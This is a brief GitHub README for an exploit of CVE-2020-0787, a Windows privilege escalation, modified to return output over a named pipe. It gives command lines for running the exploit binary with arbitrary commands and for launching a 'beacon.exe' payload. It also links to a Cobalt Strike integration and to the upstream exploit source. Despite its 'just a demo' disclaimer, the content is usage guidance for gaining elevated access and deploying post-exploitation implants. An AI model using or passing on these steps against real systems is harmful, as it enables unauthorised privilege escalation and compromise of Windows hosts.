README.md

February 20, 2022 · View on GitHub

CVE-2020-0787(named pipe)

It's Just A Demo,Do not use in real.

-Get result for Command execution(Use cmd /c): exp.exe "cmd /c whoami > \\\\.\\pipe\\showme " show

-Run beacon.exe: exp.exe "C:/beacon.exe"

For CobaltStrike

It's better one than current project: https://github.com/yanghaoi/ReflectiveDllSource/tree/master/CVE-2020-0787_CNA

Reference

Source from: https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION

Contents

  1. 1CVE-2020-0787(named pipe)
  2. 2For CobaltStrike
  3. 3Reference